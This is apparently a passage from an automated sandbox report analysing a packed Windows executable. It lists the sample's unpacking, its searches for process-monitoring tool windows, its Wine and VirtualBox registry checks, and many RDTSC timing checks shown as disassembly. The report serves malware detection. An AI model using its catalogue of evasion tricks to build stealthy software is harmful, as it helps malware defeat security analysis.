                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: fr2Mul3G6m.exeStatic file information: File size 2935296 > 1048576
                Source: fr2Mul3G6m.exeStatic PE information: Raw size of dvyasulg is bigger than: 0x100000 < 0x2a4800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeUnpacked PE file: 5.2.fr2Mul3G6m.exe.240000.0.unpack :EW;.rsrc :W;.idata :W;dvyasulg:EW;pfegkdjv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;dvyasulg:EW;pfegkdjv:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: fr2Mul3G6m.exeStatic PE information: real checksum: 0x2d7168 should be: 0x2cf581
                Source: fr2Mul3G6m.exeStatic PE information: section name:
                Source: fr2Mul3G6m.exeStatic PE information: section name: .rsrc
                Source: fr2Mul3G6m.exeStatic PE information: section name: .idata
                Source: fr2Mul3G6m.exeStatic PE information: section name: dvyasulg
                Source: fr2Mul3G6m.exeStatic PE information: section name: pfegkdjv
                Source: fr2Mul3G6m.exeStatic PE information: section name: .taggant
                Source: fr2Mul3G6m.exeStatic PE information: section name: entropy: 7.982637526766752

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4100D1 second address: 4100D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 40F176 second address: 40F19A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBF093632F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 40F31C second address: 40F360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF0920B216h 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FBF0920B21Bh 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FBF0920B213h 0x0000001e pushad 0x0000001f push eax 0x00000020 pop eax 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 40F360 second address: 40F36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBF093632E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 412460 second address: 4124F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B213h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FBF0920B212h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c jmp 00007FBF0920B214h 0x00000021 popad 0x00000022 nop 0x00000023 push ecx 0x00000024 sub ecx, dword ptr [ebp+122D2B0Eh] 0x0000002a pop ecx 0x0000002b jnl 00007FBF0920B20Ch 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FBF0920B208h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov ch, 36h 0x0000004f push 8BBCAD47h 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jnl 00007FBF0920B206h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 41261B second address: 41261F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 412683 second address: 4126DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF0920B212h 0x00000008 jmp 00007FBF0920B20Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 4EE2D78Ah 0x00000016 add edx, dword ptr [ebp+122D2B5Eh] 0x0000001c push 00000003h 0x0000001e mov ecx, edx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007FBF0920B208h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c push 00000003h 0x0000003e mov cx, ax 0x00000041 call 00007FBF0920B209h 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4126DF second address: 4126F1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4126F1 second address: 4126F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4126F5 second address: 4126FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4126FB second address: 412713 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF0920B20Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 412713 second address: 412733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007FBF093632ECh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jnp 00007FBF093632E8h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 412733 second address: 412742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 412742 second address: 412746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 412746 second address: 41274A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 41274A second address: 41279F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBF093632E8h 0x0000000c popad 0x0000000d pop eax 0x0000000e cld 0x0000000f lea ebx, dword ptr [ebp+1244E1C7h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FBF093632E8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f jmp 00007FBF093632F8h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 41279F second address: 4127A9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF0920B206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 432C3B second address: 432C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 432C3F second address: 432C49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 432C49 second address: 432C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 432C4D second address: 432C6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FBF0920B20Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FBF0920B206h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 432C6D second address: 432C9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBF093632F2h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430BAD second address: 430BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430BB1 second address: 430BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430BBA second address: 430BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430BC0 second address: 430BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF093632EFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF093632EDh 0x00000011 jmp 00007FBF093632F0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430BF3 second address: 430C03 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF0920B206h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430C03 second address: 430C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430C09 second address: 430C20 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF0920B206h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jnp 00007FBF0920B206h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430C20 second address: 430C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430C27 second address: 430C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 430F01 second address: 430F06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431870 second address: 431878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431878 second address: 43187E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43187E second address: 4318B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF0920B206h 0x0000000a jns 00007FBF0920B206h 0x00000010 popad 0x00000011 pop esi 0x00000012 push esi 0x00000013 jmp 00007FBF0920B212h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FBF0920B20Ch 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431B40 second address: 431B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431B46 second address: 431B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431B4C second address: 431B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431B50 second address: 431B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431CAE second address: 431CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431CB2 second address: 431CBC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF0920B206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 429BF1 second address: 429BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 429BF7 second address: 429C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FBF0920B218h 0x00000012 jmp 00007FBF0920B216h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 429C33 second address: 429C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431E20 second address: 431E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 431E28 second address: 431E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43269F second address: 4326B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF0920B206h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FBF0920B206h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43926F second address: 43928C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4398F1 second address: 4398F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4398F5 second address: 43992E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a jmp 00007FBF093632F4h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 je 00007FBF093632E8h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBF093632EBh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 439AB0 second address: 439ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBF0920B206h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43CF21 second address: 43CF32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632ECh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43D0A5 second address: 43D0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43D0A9 second address: 43D0AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43D0AD second address: 43D0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B218h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
